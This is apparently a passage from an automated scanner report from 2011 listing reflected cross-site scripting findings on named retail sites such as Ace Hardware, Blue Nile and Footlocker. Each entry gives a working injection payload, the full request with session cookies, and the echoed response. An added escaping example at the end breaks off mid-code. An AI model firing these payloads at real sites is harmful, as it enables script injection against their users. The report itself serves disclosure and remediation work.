Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:04 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Type: application/json;charset=utf-8
Connection: close
Content-Length: 1753

liveclicker.api_res[0]c9387<script>alert(1)</script>63737674e7e = { "widgets" : { "widget" : [ { "widget_id" : "15895", "asset_id" : "27151", "versionNumber" : "1", "title" : "How To Train Your Dog to Sit", "length" : "1:07", "rating" : "0", "views" : "911455", "t
...[SNIP]...

5.47. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The value of the ckc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f479"><script>alert(1)</script>f3b7e714c62 was submitted in the ckc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=2f479"><script>alert(1)</script>f3b7e714c62&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510843775&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4DF5DD64853B60409638EF60D0B5CE6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=4ADDCC8A6DA08BE89115D16EDFB6D509; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:14:11 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 498

<html>
<body>
<iframe width="0" height="0" frameborder="0" id="mbadn" scrolling="no" style="display: none;" src="http://adserver.veruta.com/track.fcgi?merchantid=854445219&category=2f479"><script>alert(1)</script>f3b7e714c62&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699979965478%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758520%22%7D
...[SNIP]...

5.48. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.aisle7.net
Path:   /api/1.0/widgets/general/newswire-widget

Issue detail

The value of the jsonpcallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 62b4f%3balert(1)//1857386a781 was submitted in the jsonpcallback parameter. This input was echoed as 62b4f;alert(1)//1857386a781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/1.0/widgets/general/newswire-widget?apikey=00617ba4d64547b589e1e8b3dac082be&format=html&styles=enhanced&content_only=true&links=resource-path-encoded&request_handler_uri=http%3A%2F%2Fwww.gnc.com%2Fshop%2Findex.jsp%3FcategoryId%3D10813502%26resource%3D&clientscript=1&jsonpcallback=jsonp130551084625262b4f%3balert(1)//1857386a781 HTTP/1.1
Host: web.aisle7.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aisle7c6=4090937773.1.3050751040.2686703417

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Hni-Request-Id: 9d0cadfc-2324-42cd-a008-a68d2528482e
Content-Language: en-us
Hni-Response-Time-Ms: 0
Cache-Control: public
Last-Modified: Wed, 16 Feb 2011 18:25:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 3753

jsonp130551084625262b4f;alert(1)//1857386a781("\u003clink rel=\"StyleSheet\" type=\"text/css\" href=\"http://web.aisle7.net/styles/dynamic/963/10006272/enhanced.css\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/link\u003e\u003cscript type=
...[SNIP]...

5.49. http://www.acehardware.com/category/index.jsp [clickid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The value of the clickid request parameter is copied into an HTML comment. The payload 63471--><script>alert(1)</script>f5bbaf27fb7 was submitted in the clickid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn63471--><script>alert(1)</script>f5bbaf27fb7 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:01:35 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
<!-- === Request Query String: categoryId=2568444&clickid=topnav_lawn63471--><script>alert(1)</script>f5bbaf27fb7 -->
...[SNIP]...

5.50. http://www.acehardware.com/category/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 69603--><script>alert(1)</script>0d9d386e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn&69603--><script>alert(1)</script>0d9d386e26=1 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:48:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:02:13 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
<!-- === Request Query String: categoryId=2568444&clickid=topnav_lawn&69603--><script>alert(1)</script>0d9d386e26=1 -->
...[SNIP]...

5.51. http://www.acehardware.com/home/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ba652--><script>alert(1)</script>9557872ffa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?ba652--><script>alert(1)</script>9557872ffa1=1 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.1.10.1305510171; s_pers=%20s_nr%3D1305510172030%7C1308102172030%3B%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20gpv_p27%3DHome%2520Page%7C1305511972080%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:32 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<!-- === Request Query String: ba652--><script>alert(1)</script>9557872ffa1=1 -->
...[SNIP]...

5.52. http://www.acehardware.com/home/index.jsp [rdir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The value of the rdir request parameter is copied into an HTML comment. The payload 25276--><script>alert(1)</script>ccb31578d5a was submitted in the rdir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?rdir=1A25276--><script>alert(1)</script>ccb31578d5a HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305544625524%3B; JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<!-- === Request Query String: rdir=1A25276--><script>alert(1)</script>ccb31578d5a -->
...[SNIP]...

5.53. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bhphotovideo.com
Path:   /c/buy/Camcorders-Housings/ci/16479/N/4267396714

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2542d"><a>b6abcdf389d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c/buy/Camcorders-Housings/ci/164792542d"><a>b6abcdf389d/N/4267396714 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541019847&t2=1305541026297&t3=1305541028965&t4=1305541013259&lti=1305541028965&ln=&hr=/c/buy/Camcorders-Housings/ci/16479/N/4267396714&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 16 May 2011 10:36:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS29f0cc=b0d1ad0ba7546d6b2b5b7e9034b704ed871d7ea6dc67d58e4dd0fe2f60ac0ec569178bf8b092ce85bc587bdd; Path=/
Content-Length: 197632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<meta http-
...[SNIP]...
<a href="http://www.bhphotovideo.com/c/buy/Camcorders-Housings/pn/15/ci/164792542d"><a>b6abcdf389d/N/4267396714">
...[SNIP]...

5.54. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bhphotovideo.com
Path:   /c/buy/Camcorders-Housings/ci/16479/N/4267396714

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fb38f'><a>2ecfd8f2719 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c/buy/Camcorders-Housings/ci/16479fb38f'><a>2ecfd8f2719/N/4267396714 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541019847&t2=1305541026297&t3=1305541028965&t4=1305541013259&lti=1305541028965&ln=&hr=/c/buy/Camcorders-Housings/ci/16479/N/4267396714&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:40 GMT
Connection: close
Set-Cookie: TS29f0cc=ae3fe2cae9d870f2a3b02425c0e4c166871d7ea6dc67d58e4dd0fe3760ac0ec569178bf8b092ce85bc587bdd; Path=/
Content-Length: 197632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<meta http-
...[SNIP]...
<a href='http://www.bhphotovideo.com/c/buy/Camcorders-Housings/pn/2/ci/16479fb38f'><a>2ecfd8f2719/N/4267396714'>
...[SNIP]...

5.55. http://www.bluenile.com/build-your-own-diamond-ring [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /build-your-own-diamond-ring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75463"style%3d"x%3aexpression(alert(1))"25b680a7acd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75463"style="x:expression(alert(1))"25b680a7acd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more&75463"style%3d"x%3aexpression(alert(1))"25b680a7acd=1 HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 10:37:54 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: Wed, 31 Dec 1969 23:59:59 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:37:43 GMT; Path=/
Set-Cookie: bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:37:43 GMT; Path=/
Set-Cookie: dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:37:43 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 220459

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns
...[SNIP]...
<meta http-equiv="refresh" content="0;url=/build-your-own-diamond-ring?75463"style="x:expression(alert(1))"25b680a7acd=1&track=more&first_step=diamond&forceStep=DIAMONDS_STEP&mode=BASIC&reason=noscript" />
...[SNIP]...

5.56. http://www.footlocker.com/login/login.cfm [bv_AA_enabled parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 529c3"style%3d"x%3aexpression(alert(1))"362edd0e270 was submitted in the bv_AA_enabled parameter. This input was echoed as 529c3"style="x:expression(alert(1))"362edd0e270 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers. The caveat is weaker than usual here: the response carries X-UA-Compatible: IE=EmulateIE7, which puts Internet Explorer 8 and later into IE7 document mode, and CSS expressions are still evaluated in that mode (they were only dropped from IE8 Standards mode and later standards modes).
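The following is an added example, not code from the XSS.CX report or from footlocker.com. It shows how the 5.56 payload turns one double-quoted attribute into three as a browser tokenizes the tag, and the two encoding steps (query-component encoding, then attribute encoding) that keep the value inside the attribute. The two render functions are assumptions modelled on the iframe fragment in the response above; the attribute tokenizer is a simplification of the HTML attribute-name and attribute-value tokenizer states.

```javascript
// Added example (not from the report): attribute-context breakout and its fix.

// Scanner-style payload from 5.56: random prefix, closing quote, injected attribute, random suffix.
const PAYLOAD = '529c3"style="x:expression(alert(1))"362edd0e270';
// Assumed template URL, copied from the response fragment in the report.
const LOGIN_FORM = 'http://www.footlocker.com/login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=';

// Vulnerable rendering: the raw parameter value is concatenated into the iframe's src attribute.
function renderIframeVulnerable(bvAAEnabled) {
  return '<iframe src="' + LOGIN_FORM + bvAAEnabled + '&dontRunBV=true"' +
         ' width="250" height="185" frameborder="0" scrolling="no"></iframe>';
}

// Entity-encode a string for use inside a quoted HTML attribute value.
function escapeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, c =>
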